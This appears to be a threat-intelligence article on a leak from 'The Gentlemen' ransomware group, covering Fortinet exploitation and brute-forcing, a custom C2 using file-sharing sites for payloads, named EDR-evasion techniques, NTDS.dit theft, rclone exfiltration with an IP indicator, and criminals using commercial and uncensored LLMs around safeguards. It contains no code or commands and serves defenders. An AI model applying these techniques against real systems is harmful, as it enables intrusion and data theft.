Evolution via Rebranding: Deconstructing the ‘The Gentlemen’ Ransomware Leak

A deep dive into a recent data leak tied to The Gentlemen ransomware group reveals a sophisticated paradox in modern cybercrime: while their operational infrastructure and evasion techniques are undergoing rapid evolution, their foundational methods of intrusion remain stubbornly consistent with tactics observed over the last four years.

The leak provides a rare window into the continuity of threat actor identities. Evidence suggests that ransomware brands are often just “rebrands” rather than entirely new entities. For instance, a specific operator identified as “Tinker” has maintained a consistent operational profile across the lifecycle of Conti (2022), Black Basta (2025), and now The Gentlemen (2026), specializing in the critical trifecta of phishing, negotiation, and credential management. This continuity is further corroborated by shared infrastructure, specifically the use of the Matrix server bestflowers247.online, which serves as a persistent link between these disparate group identities.

Exploitation of the Edge: The Fortinet Connection

Despite shifting organizational identities, the initial access vector remains heavily reliant on vulnerable edge perimeter devices. The Gentlemen’s internal communications show an intense focus on Fortinet ecosystems, with over 80 documented references to FortiGate systems.

The group explicitly discussed the exploitation of CVE-2024-55591, a critical FortiOS authentication bypass vulnerability. Beyond sophisticated exploitation, they frequently resorted to low-effort brute-force attacks against approximately 1,000 Fortinet VPN instances, leveraging predictable credential patterns such as “gentlemen25.” This reliance on edge vulnerabilities mirrors the historical playbooks used by both Conti and Black Basta, highlighting a persistent defensive gap in perimeter security.

The Pragmatic Use of AI in Cybercrime

While much of the industry focuses on AI-generated malware, The Gentlemen demonstrate a more pragmatic, “human-in-the-loop” approach to Artificial Intelligence. Rather than using AI for code generation, actors are leveraging Large Language Models (LLMs) like ChatGPT and Claude to augment social engineering, automate victim communications, and streamline code translation for malware variants.

According to a report by Vectra AI—analyzed by Ransom-ISAC—the leak contains over 3,300 Rocket.Chat messages that detail these workflows. To bypass the safety guardrails of commercial AI, the group experimented with uncensored LLMs hosted on platforms like Hugging Face and utilized rented GPU clusters to facilitate large-scale data analysis of stolen information. However, internal sentiment suggests AI is viewed as a productivity multiplier rather than a replacement for human expertise.

Advanced Evasion and Proprietary Tooling

The most significant area of innovation lies in the group’s transition away from “off-the-shelf” frameworks. The Gentlemen have moved beyond Cobalt Strike, opting instead for a bespoke Command-and-Control (C2) platform dubbed G-BOT. This custom framework supports SOCKS5 tunneling and utilizes legitimate file-sharing services like temp.sh and 0x0.st for payload delivery to blend in with normal web traffic.

Furthermore, their approach to Endpoint Detection and Response (EDR) evasion has shifted from avoidance to active subversion. The leak references highly technical bypass methods, including:

• NTDLL unhooking to bypass API monitoring.
• Direct syscall execution to evade user-mode hooks.
• ETW (Event Tracing for Windows) patching to blind telemetry.
• Manipulation of debug registers to disrupt debugger-based detection.

The maturity of this “evasion economy” is underscored by operator claims that specialized tools capable of neutralizing leading EDR solutions can be acquired on the underground market for approximately $5,000.

Hypervisor Targeting and Post-Exploitation

A disturbing trend identified in the leak is the focus on hypervisor-level attacks. By targeting Hyper-V environments directly, The Gentlemen can encrypt virtual machine (VM) storage at the host level. This maneuver effectively bypasses any security monitoring residing within the guest OS, rendering traditional endpoint protection blind to the encryption process.

Once inside, the post-exploitation lifecycle follows a well-documented pattern of credential theft and data exfiltration:

• Credential Harvesting: Use of LummaC2, Phemedrone Stealer, and DumpBrowserSecrets to scrape browser-stored data.
• Domain Dominance: Extraction of the NTDS.dit file via Volume Shadow Copy to gain full domain administrative access.
• Data Exfiltration: Utilizing rclone to move data through a Synology NAS staging server to cloud storage providers like MEGA.

In one specific instance, an exposed configuration revealed active exfiltration to the IP 193.228.128.2 over port 2222, utilizing the account name “d0wnloAd1.”

The Constant Threat

The Gentlemen leak reinforces a sobering reality for cybersecurity professionals: while the “wrapper” of ransomware—its branding, its C2 frameworks, and its evasion techniques—is constantly evolving, the “core” remains the same. Exploiting unpatched edge devices, harvesting credentials, and abusing legitimate cloud tools for exfiltration continue to be highly effective. Innovation is concentrating on the ability to hide and scale, while the fundamental gaps in enterprise perimeter security remain the primary entry points.